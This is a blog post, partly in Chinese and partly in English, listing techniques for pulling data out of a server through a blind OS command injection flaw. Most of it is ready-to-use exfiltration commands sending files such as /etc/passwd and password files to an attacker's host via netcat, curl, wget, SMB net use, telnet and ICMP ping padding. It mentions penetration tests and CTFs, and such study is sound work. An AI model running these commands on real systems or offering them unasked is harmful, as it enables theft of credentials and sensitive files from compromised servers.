Data Exfiltration via Blind OS Command Injection

发布时间:November 18, 2015 // 分类: // No Comments

常常遇到这样的情况,可以执行命令,但是却不能把执行的结果回显出来.后来出现了cloudeye这样的平台。不过只是能看到有请求的日志,有些没有办法显示出来。比如内容比较大的时候.apacelog只是能够显示为POST xxxx 然而并米有相关的内容.

通常我们执行命令的时候是想同时几个命令一起执行。这样增加效率问题,这种情况在命令执行漏洞时候特别常见.已知的命令加上参数可控,然后当前的只能执行这个命令。我们再当前的环境中想执行其他的命令就需要.可以将命令操作符允许您运行任意在主机操作系统命令。下表详细信息可以使用的这些数量在这种攻击中:

我们如何获取敏感信息或从主机在这种情况下我们的结果吗?将详细介绍多种方式上传就能达到一个web主机外壳。

 

NetCat

使用Nc隧道把需要的文件传出来

nc –l –p {port} < {file/to/extract}

再我们的机器上去连接目标机器的端口,可以看到相关的内容被输出

如果存在漏洞的机器是windows的,想将内容输出可以使用

type {file to extract}  | nc -L -p {port}

 

CURL

curl是linux上特别好用的一个工具.除了HTTP请求我们还可以使用它来进行FTP/SCP/TFTP/TELNET等请求.在cloudeye里面,我们的请求方式类似于

curl http://abc.333d61.dnslog.info//tangscan/iswin.jpg/?cmd=$(whoami)

对于读取到的文件,内容过大不能使用Get 只能使用post的方式

cat /path/to/file | curl –F “:data=@-“ http://xxx.xxx.xxx.xxxx:xxxx/test.txt

这样可以在服务器的日志里面看到发送的内容

CURL也可以使用ftp协议传输数据,只要是存在命令执行漏洞.使用curl -t就可以了

curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}

正如之前所说的,curl除了这些用法,还可以使用tftp/telnet/scp等协议

WGET

wget是我们熟知的下载命令.使用WGET向服务器提交请求格式如下

–header=’name:value’

这样就可以定制一个包含自己需要的请求的头部信息.这里的可以是一个文件内容

wget –header=”EVIL:$(cat /data/secret/password.txt)”http://xxx.xxx.xxx:xxx

也可以使用命令来处理超过一行显示的内容

wget –header=”evil:`cat /etc/passwd | xargs echo –n`” http://xxx.xxx.xxx:xxxx

It is also possible to use WGET to submit a POST request to our web server  and send string data in the request body using the ‘—post-data’ flag or the contents of a file using the ‘—post-file’ flag. These flags expect the content of the form

‘key1=value1&key2=value2’. 

To retrieve the contents of a file using ‘post-data’ we can run a command such as the one below which extracts a file containing a secret code:

wget –post-data exfil=`cat /data/secret/secretcode.txt` http://xxx.xxx.xxx.xxx:xxxx

The next command shows how we can use ‘post-file’ to retrieve a web page that forms part of the application. On a pentest we might do this to view the code to identify further vulnerabilities; on a CTF you might do this to reveal a trophy hidden within the PHP code:

wget –post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx

SMB

If the vulnerable web application is running on windows it may be possible to extract a file by creating a network share on your host and then getting the victim server to connect to your share and to copy the file over. This can be done with the net use command:

net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\{filename}.txt

TELNET

If telnet client is on the remote server you can use this to transfer a file to a listener on your host using the following command:

telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

ICMP

If the host you are targeting has been hardened and tools such as netcat, wget and CURL have been removed there are still some techniques you can use.  Try and get the host to ping your box and see if ICMP is let out through any intervening firewalls.  If it is, and the underlying host is running Linux, we can exfiltrate data in ICMP echo requests using the –p flag.  The –p flag allows you to specify up to 16 “pad” bytes. This is where we will store the data we want to exfiltrate.

First we need to convert the file into hex, and then specify the data to be inserted into the packet. This can be done with the following one-liner:

cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

In Wireshark we can observe the packets containing our data.  You could write a script which scrapes the packets and re-assembles the file on the host.

标签:none

添加新评论 »

分类
最新文章
最近回复
  • 轨迹: niubility!
  • 没穿底裤: 好办法..
  • emma: 任务计划那有点小问题,调用后Activation.exe不是当前活动窗口,造成回车下一步下一步...
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...